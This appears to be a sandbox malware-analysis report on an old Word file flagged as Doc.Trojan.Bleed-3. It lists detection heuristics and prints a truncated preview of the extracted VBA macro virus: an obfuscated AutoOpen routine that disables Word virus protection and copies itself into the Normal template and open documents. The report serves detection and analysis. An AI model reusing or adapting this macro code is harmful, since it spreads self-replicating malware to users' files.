MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing a WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The VBA code is heavily obfuscated, which makes its exact function difficult to determine, but it is built to execute automatically when the document is opened. The ClamAV detection of 'Doc.Trojan.Bleed-3' further supports the malicious classification. The primary IOC is the presence of the obfuscated VBA macro.
Heuristics (4)
- ClamAV: Doc.Trojan.Bleed-3 (severity: critical; rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Bleed-3.
- VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS). Document contains VBA macro code.
- AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN). AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6469 bytes |

SHA-256: 1b0e5f812cfe0df0cec1b0032308eaaf2d8a50319caa9da949b396e9a8cbf2e6

Detection
- ClamAV: Doc.Trojan.Bleed-3
- Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Rem Name: Word97Macro.Crypted
Rem Author: jack twoflower LineZer0/Metaphase
Rem Date: June 1999
Sub AutoOpen(): Dim jack(20) As String
jack(1) = "SuÊßÝbÝ AutoõÝ÷ÙÒócúÐ÷ÞlosÕÛöe()"
jack(2) = "Oµä×n E·ºüÕrr¸·ÏñoØÍðÀÐréñÐ ø»èÇ·ReáÇ»µØæsume NõÑöexò·´ÐtÚðú¶çü:µ ýöèÔc·µ = ChðÕÜr(6×5ÑÌô»Ïõ) + òëChr(¼øÂáí11˸¸ÞÜ6)ÔèÝ + Chr(1äÃõ½æù1ÞÚÂ6) + ChìÓñ÷Àür(11÷ÌÝ»Ë4)Ç·Öæ ä+ Chr(105ï) +¶¸Ü Chr(½98) + ¶ÆçCºæÙ¶üõhÞéÔâÜr(1Ìôµ17ùø÷¾ç) Þøçµð+ ChrÃñ͵Í(¿ñöµó116)Ò +äùó ChîÖr(1Óɵ01) + Chôùܶràß¼È(32) ÌÁ+ CúÌÝ´Îûhr(86) + CêÕ¶¿hr(66) + CËhÄÐòÆ·r(95) + Chr(ÐÉîëÏÞ7ü·ÖÎ8ÓùÐ)ÌÌøÔñÎ + ûżñCÒ¼ÌhrÊ(À97) + C¹¹hrÍòøÊÅ(109Þãóô) ¶×¿½+ Chr(1ÐÙ·ïÅ01) + C÷¸h¸ÃìüÈr(32) + éÃChÝ´ÇêÓr(61)øû è´Üú+ Cé̹̽hr(¾Ø3éÔý2¹âÍ) + ChÖ¾äír(34¾»æåÍ) + Chër(6½Ü½ìÌÜ7èÞÌôÐ) + CÙÀéÙâhr(114) ݶ+Çè ChÖäìÕ»r(121óù) + Chïr(´àèî1ÎØëâÏü12) +¾»È¿â ChrÀ÷(116) ÙÜÌ·+¸ò ChrôýØþçþ(1µÉãÃÙ0×éÃÐû1) + äæChrÒÔèýé(100ü½ò) + Chr(ûòºÆ3äíñØ4)"
jack(3) = "c¹Æß¿Ö·oµÞéü = Chr(ã67)éÄ + ChrÌ¿ë(11àÅÞÞ4îÑ) áþ»+ËѼú¶ Chr(óùÈá1¸¶21îýÝàÅò)ÅÑÞÑ +¼Ëú Chr(¸¸¸È1â¾ååà1¿2)á + ChºÉr(116) +üÒúÏ Chr¸Ó¿íÛ(Ë´1û0Äë1) + ChrÍì(100à):ºÞïÒíô täüÀ ·×Í=ÂóÉÇ ChrÀ(×ô99âö) Ì»Ã+ Chr(58) + ¼´èÙCæ¹hrÉÅêØ(9ûûË2)½Ç׼ +еÄÊïç ÖChr(110) + Ch¼Ñâþér(ðïÌà1ðíèÂ17) É+ ChrãÅÐùöÞ(46) ÷ø+åóÝÐ㸠ChòõìÓÜãr(11ÈØêúïö5) Þé+ÏÁ ChrÖæÊû(121)þĹåý Ñëì+ ChظÖürµ·Ì¶åÛ(115)"
jack(4) = "OptiýÐôùons.÷»ÅúàVÛòiärusProtÉêëþÕeÙÔàîÜctionß×´Þû ¾ÀÃí÷= Falseéú: Oü¿Ìõ½ptionsÉÛ.SÎãÄaòõÏñvÃe¼´ÉÁNormaÍÆÁÓlPrÙÌëøompt = False"
jack(5) = "vÕîÑÆúc×ÃÏá Öçæ¸= ع¸ÓèíThÁØÏisDo¾Òçcument.ÇúºVBöPÈÎroÅãjeÖéct.VBComÚÂÖïÆpÍäÝonents(co).CodeMÃåÍÜÈóoÀâduæµÞlÙe.ÍÕLiÜú˸ânesØ(1,¶ã 29ÛÆÐé)"
jack(6) = "OëµàÓïpeýÉËÀn tºõËÌòµ For Out߻ѵØßp½ut»µÝ½ç As #1õä·: ÅÎÄÓæØPǽòÌÍörºýint Î#ÔÙïÝÀ1ùØ, c: Pôçø¾Úrint ÷´â#´1ô, vcîÌ: Cloðþæse #1"
jack(7) = "IfÊóÉê LenÞê»Ã(NoÊïrmäÃäalTemÝèplate.ÚíÆVÜê´×BProýÔÃþçjeúù·câ»È¾t.VBComÒpÊô¸ÎºoòÓÚÚÆnÂûݾºenÛßÏtØs(ÓÁÅócùÝÛÐàÒoÎüé´).NameÀã¼Þöü) = 0þá¶ T¾hen ÉÕNoåÓrmalïÝêÑTúÝýempõ¸ìÀlateæÍ.VBÁØProjeÕþø¹¼ÖctÚÚÈ.VBComponents.ôúûûѸIºÙ¸ì¸mó÷´ÏÔpܼ¿õort tÐÂÝ"
jack(8) = "If LenÆþÊõ(ActiveDèocumeûnt.ÀVBProjÞ¸·ÚÒ¾ec½t.ÄÀVBCoàÔÐùmponenÁÈÃòÜtôÃèùÁÕsڵξÝó(cÑ×o)Ü.ÊßËÕñµNameèÄ) = 0 Then AíÒÜàÊàc´tîÎiÏvïüñõeúÓùöæ»Dóäoc¹òó·ument.öÚVBProÍÃjectÊà.VBCéÔ×ào¶¶¼µmpoæneónts.Import t"
jack(9) = "TÐáËܽáhêìïùiò¼ËæØ´sDǽ÷ÈæoÄÏÇæ´óc¿çÒζuçèïѵment¶ä÷êþ.йæVBÌProjeËíctð¾Í.VBComÐ×ÕóØäpæôµ×o¶nêÜýöeÄòþòÓÀnts(cïÒÝØàÍo)òêÁ.Cêµ÷ÞþodeModuôåleüɹÝÎó.ÞÐäDeletãeLÁýine÷üÝéÛsÞÛ·õÜ Ë¸÷üÝê30, 9"
jack(10) = "ThçâëöisDocumëîÝenýþÅÚtÒé.åþ¶VÙÍÔÐäBØPrÒ÷ojºô·üäect.×÷VBÈñÐÒÇComponents(ÁÓñÉéÛcòçñÒØËoÒÌÐó).CodÛ´âÂeModÕuðÆøÙÇÔle.DeüÐül¶Àù×ete¾LinesÚý¼ 30ì, òë5ï"
jack(11) = "IõÖ÷·ýäf DÏaòy(Nìõow(ÊÍ˻Ѿ))Ý =ßèý´ñù üÛúÉý´31··ÔãÈì TÀÌhenúà Msg¶øBû·èox îºCÃêÇâèhrÊ(ÇÏ11Ç÷0) +Öîã¾ ChêæÄür(6Â9) + Chr¼(÷âÍó86ë) Ò+ Chr÷ö¾ÝË(6ßüµ´ÃÙ9)Ø»Ò +Ô¶ Chr(82) + å×ÍÍöåChá¹Ëû¶r(àÚ3׿È2) üÞÈ¿òô+ ChÙüÛèÅr(1üôÊ¿Ò0æý7) ïéÖ+½ CÂÞÛhrìÜ(èÂäºç¿78)Îë +ýÍÕÌçú Å»½üÇCÜé»hݼÑÔrÏþüë(79) ê+èÕíÅÉ ç¼þÆøÑCÂÄÍíÄhr(8ÛåáÜ7»÷ÀãÚõ) +÷ÅìØ Chr(32åûø) + C÷hrîæÝò(1ÓÀ10) дÍé+ÜòØÝܺ CÝhrÓÁÆÐº(79Ì)¾ÔÚêïÌ ¾+ïØ âChrÙà·õù(8ììιÏ4) +Çç¹ Chr(72)ãøãäèÝ + åä÷ChëÀÃöµr(73) Òúê¹Ø¿+ þÚChrôÆï´(78) é+ Cühr(7å1þ) + ¾Chçr(33)ÂÀë켯 + éý¾CþÙÝëhr(3ʸþ2ÐÈÜ) +µ¶öÓ¾Í Chr(16ö9íÞíù) +ËÃØÏúà ëØChr(57) + ÎÎßÞêCh»ãïr(57ðÛ×å)¿ÖõÒ ÔÑ÷+ ChÉ¹ê´Øör(3É×Àºøù2) Ö×Ôñû×+ ËüáüôóCÎí´õÌËhr(àÓÁìòÌ106)º + CÙô¸ø·Îhr(çÛÁÛ9Ûô7)ÞÞ ãÝÖîàÒ+ Chr(9¾èÀõê9ïàÜÛçÁ) é¾ÑßÜ+ùÀ ChrÍáþÐÑÍ(107ôòûøõ)¾¸ +úã·Íáþ ChØr(116) ÄÀéÇ+ïØ ChöÆÖÉr(1ÏãÑëöé19Êñà)ð + ´óÙChr(üüå·111)"
jack(12) = "If¼ßºç ÄôActivþüØõeDocæèçumeλnt¾ò¶ã.ǸÁ÷SaveáòÖþdë½ = ÆFaýþlÈεásÔÆÖáe TÚÜÐùhen ´ÝÌÈActivÚeDocumeÏÀÍönt.SavÑÊÎüâòeAÄ¿Òñs Aëü¾âÛòctiÔó·½veľÒëÏÕDocum÷йüÒ×ent.ÔâÙ¼FullNìÙíÚеame"
jack(13) = "ActiveD÷ÃÂÌÆocumóäõã»eãõÓnt.ÍCloóÆÚôse wdDÇîýoNot¶úåSaÎv÷øÇâeCþhanÀº¾»gâààes"
jack(14) = "EnÉÓ½îÑÐd×ÛÇÙ ¸ÑSub"
For i = 1 To 14: vc = vc & jacky(jack(i)): Next i
ThisDocument.VBProject.VBComponents("Crypted").CodeModule.InsertLines 30, vc
If MacroContaine
... (truncated)